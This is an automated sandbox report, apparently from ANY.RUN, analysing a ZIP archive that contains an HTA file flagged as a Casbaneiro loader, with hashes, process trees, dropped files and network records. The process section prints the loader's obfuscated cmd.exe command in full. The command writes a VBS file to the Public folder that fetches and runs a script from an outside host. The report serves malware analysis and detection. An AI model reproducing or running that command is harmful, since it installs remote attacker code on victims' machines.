File name:

Setup-15052025130545.zip

Full analysis: https://app.any.run/tasks/2dfcf179-90a6-47f6-aee1-7c42bc6459be
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 20:10:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
casbaneiro
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract, compression method=store
MD5:

2A7F797F2B2373193CC128EFF067AC64

SHA1:

A1656755F1F08F00C64572C45791A88FC9DA0CB6

SHA256:

41EFF1AA90D46E5573F0F7FB8D4EE3F8CA438231EBEC9A90EDCA12F49D38F14E

SSDEEP:

96:XrvSLTIyP/Hb0xbECyMfmPGnmumalm8avguMxSnOCAr7kOZO0RnuXHyl:XrvqTIoD0x5k+Navg+n/ZOtRYQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • CASBANEIRO has been detected

      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)

    • Generic archive extractor

      • WinRAR.exe (PID: 680)

    • Accesses name of a computer manufacturer via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses BIOS(Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 5528)

    • Gets script object from HTTP/HTTPS (SCRIPT)

      • wscript.exe (PID: 5528)

  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 5988)
      • cmd.exe (PID: 4688)
      • mshta.exe (PID: 4408)
      • cmd.exe (PID: 5416)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)
      • cmd.exe (PID: 4756)
      • wscript.exe (PID: 5528)

    • The process executes VB scripts

      • cmd.exe (PID: 4756)

    • Accesses OperatingSystem(Win32_OperatingSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses ComputerSystem(Win32_ComputerSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses language version of the operating system installed via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Access Product Name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses domain name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Gets computer name (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses operating system name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)

    • Accesses WMI object caption (SCRIPT)

      • wscript.exe (PID: 5528)

  • INFO

    • Manual execution by a user

      • mshta.exe (PID: 4408)
      • WinRAR.exe (PID: 6476)

    • Checks proxy server information

      • mshta.exe (PID: 4408)
      • wscript.exe (PID: 5528)
      • slui.exe (PID: 6640)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4408)

    • Reads the software policy settings

      • slui.exe (PID: 5216)
      • slui.exe (PID: 6640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2025:05:15 19:05:44
ZipCRC: 0x2f3dda10
ZipCompressedSize: 6525
ZipUncompressedSize: 6525
ZipFileName: Setup-15052025130545.hta
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
145
Monitored processes
15
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs sppextcomobj.exe no specs slui.exe winrar.exe no specs rundll32.exe no specs mshta.exe no specs #CASBANEIRO cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
680"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\Setup-15052025130545.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1812C:\WINDOWS\system32\cmd.exe /S /D /c" echo"C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2140C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
3332C:\WINDOWS\system32\cmd.exe /S /D /c" echo"C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4008\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4408"C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\Desktop\Setup-15052025130545\Setup-15052025130545.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\SysWOW64\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
4688"C:\Windows\System32\cmd.exe" /k echo|set /p=^"DDmjXJbYtOkhEValsmLuXsF=".":dghwmsRwqZct="i":EtBXmXsEweAtqNOseqsEkb=":":XDarh="g":GetO">C:\Users\Public\tuGYPPqTnTYnIIR.vbs&echo|set /p=^"bject("scr"+dghwmsRwqZct+"pt"+EtBXmXsEweAtqNOseqsEkb+"hT"+"Tps"+EtBXmXsEweAtqNOseqsEkb+"//102"+DDmjXJbYtOkhEValsmLuXsF+"57"+DDmjXJbYtOkhEValsmLuXsF+"205"+DDmjXJbYtOkhEValsmLuXsF+"92"+DDmjXJbYtOkhEValsmLuXsF+"host"+DDmjXJbYtOkhEValsmLuXsF+"secureserver"+DDmjXJbYtOkhEValsmLuXsF+"net//"+XDarh+"1")">>C:\Users\Public\tuGYPPqTnTYnIIR.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbsC:\Windows\SysWOW64\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4756c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbsC:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
5216"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5416C:\WINDOWS\system32\cmd.exe /S /D /c" set /p="bject("scr"+dghwmsRwqZct+"pt"+EtBXmXsEweAtqNOseqsEkb+"hT"+"Tps"+EtBXmXsEweAtqNOseqsEkb+"//102"+DDmjXJbYtOkhEValsmLuXsF+"57"+DDmjXJbYtOkhEValsmLuXsF+"205"+DDmjXJbYtOkhEValsmLuXsF+"92"+DDmjXJbYtOkhEValsmLuXsF+"host"+DDmjXJbYtOkhEValsmLuXsF+"secureserver"+DDmjXJbYtOkhEValsmLuXsF+"net//"+XDarh+"1")">>C:\Users\Public\tuGYPPqTnTYnIIR.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbs"C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
4 904
Read events
4 875
Write events
29
Delete events
0

Modification events

(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\Setup-15052025130545.zip
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:name
Value:
256
(PID) Process:(680) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:size
Value:
80
Executable files
0
Suspicious files
4
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
5988cmd.exeC:\Users\Public\tuGYPPqTnTYnIIR.vbstext
MD5:B4FFA7F25020F9259B1176DD43A5002E
SHA256:90D9DF108BA788893FBDD05DD960F455BFEE903FB0B79E2653CA1994405592E2
6476WinRAR.exeC:\Users\admin\Desktop\Setup-15052025130545\README.mdbinary
MD5:8DAA97D2C88561B0CD5F5328ED76B8CC
SHA256:7789EF70BFB2E26CC32ECF3FA65B1A692A6FE1FF06531FCFA39F0CF104BD0E54
5528wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BF802A2F2F94A22C056A1A4B8A44BB8F_680DB6477E21E9909FDFFAF811D5496Fbinary
MD5:6E8B3E9DEEA9B7D55E6152E09B55D806
SHA256:4B4B3A32471C2FBB987A7308A4F3212636B9C041A6F17109B1F2179F59F5190D
5528wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\g1[1].htmhtml
MD5:8D156A3026840157CA292D51F52152BC
SHA256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
5528wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751der
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
5528wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:746DC47E10497F8E799B0983BF7A3AF2
SHA256:AB6F6C9B21E843367967D2C6436B11D43ABAE885095433854C2C2E985C644D2D
6476WinRAR.exeC:\Users\admin\Desktop\Setup-15052025130545\Setup-15052025130545.htahtml
MD5:1E34C12D5CB7759AE2A5FE4EDACE94A2
SHA256:7473F9F30CDDEB34E13F3A9A9604D3675B960050E42EAEAEAC3FEB4A26217017
5528wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\g1[1].txtxml
MD5:2BA4D2B1C609AEB2A2400078E56BA645
SHA256:9953A1442560EAB616CC4AD84D75D54758B9D243DFBE36B20EC52F53E8FEAF43
5528wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BF802A2F2F94A22C056A1A4B8A44BB8F_680DB6477E21E9909FDFFAF811D5496Fbinary
MD5:9899FCA12B3071C41E992E6C7994C17E
SHA256:164B8A9BDD2599CBF1F14F35776DBFC8F60EDB6E21F4AC8ACFFC2B286870E988
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
28
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
304
23.216.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5528
wscript.exe
GET
200
2.16.168.117:80
http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgXTpRNyPUo0IRfkZ4xJHFaaRQ%3D%3D
unknown
whitelisted
5528
wscript.exe
GET
200
23.209.209.135:80
http://x1.c.lencr.org/
unknown
whitelisted
6576
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6576
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.37:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.216.77.37:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.216.77.37
  • 23.216.77.29
  • 23.216.77.42
  • 23.216.77.5
  • 23.216.77.39
  • 23.216.77.26
  • 23.216.77.43
  • 23.216.77.30
  • 23.216.77.35
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.3
  • 20.190.160.132
  • 40.126.32.74
  • 40.126.32.134
  • 40.126.32.133
  • 40.126.32.138
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
via.placeholder.com
whitelisted
102.57.205.92.host.secureserver.net
  • 92.205.57.102
whitelisted
x1.c.lencr.org
  • 23.209.209.135
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Setup-15052025130545.zip